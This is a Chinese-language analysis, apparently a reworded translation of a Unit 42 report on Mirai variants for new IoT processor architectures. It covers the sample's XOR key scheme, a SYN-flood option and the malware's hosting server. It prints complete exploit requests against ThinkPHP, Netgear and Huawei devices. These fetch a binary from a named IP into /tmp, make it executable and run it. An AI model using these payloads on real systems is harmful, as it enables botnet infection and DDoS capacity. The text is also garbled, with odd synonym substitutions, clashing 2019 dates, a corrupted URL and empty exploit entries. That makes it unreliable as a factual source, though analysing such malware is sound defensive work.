概述
2019年2月底,unit 42研究人员发现了新出现的为新处理器架构编译的Mirai样本。尽管Mirai的源码在2019年就揭露了,可是它的进犯方针是特定的一批处理器架构集。
Unit 42研究人员发现了专为Altera Nios II, OpenRISC, Tensilica Xtensa和Xilinx MicroBlaze处理器的样本。这是Mirai第2次扩展新的处理器架构,上一次是2019年1月发现的进犯ARC CPU的样本。这阐明Mirai的开发者还在不断更新技能,并进犯IOT设备。
本文首要介绍新发现的样本相关的基础设施,以及其他Mirai样本怎么运用已知的缝隙运用等。
新样本的新特征
除了支撑新的处理器架构外,研究人员还在新样本中发现了以下特征:
加密算法。新样本对本来Mirai代码中运用的规范字节XOR算法进行了修正。运用11个8字节的key,一切都运用字节级的XOR来获取终究的key,代码如下:
tablekeys = [0xdeadbeef, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF]
xor_key = 0
for key in tablekeys:
xor_key ^= key&0xff ^ (key>>8 & 0xff) ^ (key>>16 & 0xfF) ^ (key>>24 & 0xff)
这相当于与0x5A进行字节级的XOR运算。
attack_method_ovh。样本中含有以下参数的DDOS进犯选项:
ATK_OPT_IP_TOS = 0
ATK_OPT_IP_IDENT = 0xFFFF
ATK_OPT_IP_TTL = 64
ATK_OPT_IP_DF = 1
ATK_OPT_SPORT = 0xFFFF
ATK_OPT_DPORT = 0xFFFF
ATK_OPT_SEQRND = 0xFFFF
ATK_OPT_ACKRND = 0
ATK_OPT_URG = 0
ATK_OPT_ACK = 0
ATK_OPT_PSH = 0
ATK_OPT_RST = 0
ATK_OPT_SYN = 1
ATK_OPT_FIN = 0
ATK_OPT_SOURCE = LOCAL_ADDR
这与本来Mirai源代码中的进犯办法“TCP SYN” (attack_method_tcpsyn)的参数是相同的,所以为什么要将相同的参数加入到一个新的进犯办法中呢?现在尚不清楚原因。据此,研究人员发现了从2019年11月开端就运用该办法的样本。
基础设施
研究人员在一个IP地址上发现了多个最新的样本,但2019年2月22日开端,该服务器将这些文件列表躲藏起来了,可是还为文件供给web服务。
图1. 保存Mirai变种代码的目录
在2月22日之前,该IP地址还供给含有以下缝隙运用的Mirai样本。这些缝隙运用都是在之前的Mirai样本中运用过的。研究人员依据这些缝隙运用估测这些变种应该是同一波进犯者在运用,缝隙运用如下:
· ThinkPHP长途代码履行缝隙
运用格局:
GET /to/thinkphp5.1.29/?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= ‘wget http://178.62.227[.]13/wrgjwrgjwrg246356356356/hx86 -O /tmp/Hito; chmod 777 /tmp/Hito; /tmp/Hito wget.exploit.selfrep.thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hito/2.0
· D-Link DSL2750B OS指令注入缝隙
运用格局:
· Netgear长途代码履行缝隙
运用格局:
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;/bin/busybox+wget+-g+178.62.227[.]13+-l+/tmp/binary+-r+/wrgjwrgjwrg246356356356/hmips;+/bin/busybox+chmod 777+*+/tmp/binary;/tmp/binary+wget.selfrep.exploit.netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
· CVE-2014-8361
运用格局:
· CVE-2019-17215
运用格局:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″
$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)$(echo HUAWEIUPNP)
总结
由于Mirai源代码是揭露的,因而开源将源代码进行习惯其他处理器的编译,以供给给进犯者更大的进犯面。这也阐明该歹意软件宗族会经过更多的嵌入式设备感染和传达,供给给进犯者更强壮的DDOS进犯的才能。
研究人员主张企业和用户对IOT设备及时更新补丁,并不要运用默许口令。